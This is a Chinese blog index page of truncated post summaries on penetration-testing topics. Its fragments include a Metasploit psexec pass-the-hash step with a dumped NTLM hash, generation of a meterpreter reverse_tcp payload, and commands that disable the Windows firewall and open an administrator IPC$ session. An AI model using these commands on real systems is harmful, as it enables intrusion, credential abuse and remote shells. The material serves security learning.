摘要:
Metaspliot进行漏洞扫描 Metasploit框架是Metasploit项目中最著名的创作,是一个软件开发、测试和利用漏洞的平台。它可以用来创建安全测试工具开发的模块,也可利用模块作为一个渗透测试系统。最初是由HD Moore在2003年创建作为一种便携式网络工具包。它是所有的安全研... 阅读全文
摘要:
转载 Seay_法师 最近生活有很大的一个变动,所以博客也搁置了很长一段时间没写,好像写博客已经成了习惯,搁置一段时间就有那么点危机感,心里总觉得不自在。所以从今天起还是要继续拾起墨笔(键盘),继续好好维护这个博客,写出心里最真实的想法,写出平时接触到的一些人和事以及一些新的技术。当然写博客也不是... 阅读全文
摘要:
第一部分是指在Android系统的手机上直接写PHP脚本代码并立即运行;第二部分则继续讲解如何把写好的PHP脚本代码打包成akp安装文件。 首先,在手机上安装两个apk包。 一个是SL4A(Scripting Layer for Android),这个是Android的脚本环境,前身是ASE... 阅读全文
摘要:
Cookies想必所有人都了解本文将围绕Cookies基础知识(什么是Cookies/Cookies如何传递/Cookies如何存储/Cookies如何查看)Cookies高级知识/Cookie的限制等等方方面面深入了解,感兴趣的朋友可以参考下,或许对你学习cookies有所帮助一,前言 Cook... 阅读全文
摘要:
抓取windows hash值 得到administrator的hash:598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BFmsf调用payload: use exploit/windows/smb/psexec ... 阅读全文
摘要:
在windows下:打开命令行窗口,停止mysql服务:Net stop mysql在cmd下启动mysql,一般到mysql的安装路径,找到mysqld-nt.exe执行:mysqld-nt --skip-grant-tables当前窗口将会停止。执行mysql 如果提示没有这个命令,先进入MYS... 阅读全文
摘要:
本文将科普下metasploit隧道代理的使用技巧。 0×00 获取meterpreter 1.首先生成可执行文件 root@kali:~#msfpayloadwindows/meterpreter/reverse_tcpLHOST=192.168.101.105LPORT=444X>m... 阅读全文
摘要:
0x00 什么是域 有人说域是一种组织结构,是个安全边界。域也有另为一个名字,"活动目录"。不管域是什么,它总有一些特点,有了它,对管理一个机构的组织单元,人员,特别是计算机就方便了许多,特别是计算机,因为域就是建立在计算机上的。加入域里的计算机,共享文件,共享上网就会很方便。 域里有个... 阅读全文
摘要:
开启服务 net start Schedulenet start wmiApSrv关闭防火墙 net stop sharedaccessnet use \\目标IP\ipc$ "" /user:"administrator"进行连接 net use \\目标IP\ipc$试环境:主机(w... 阅读全文
摘要:
首先确定这个网站使用thinkphp的框架国内很多php开源项目的代码都是使用thinkphp框架编写的,但是thinkphp框架有很多版本,如何才能知道我们使用的框架是哪个版本的呢?在URL后面加thinkphp的目录,也有可能爆出来 这是一个tankphp的网站目录。供参考admin是后台工程文... 阅读全文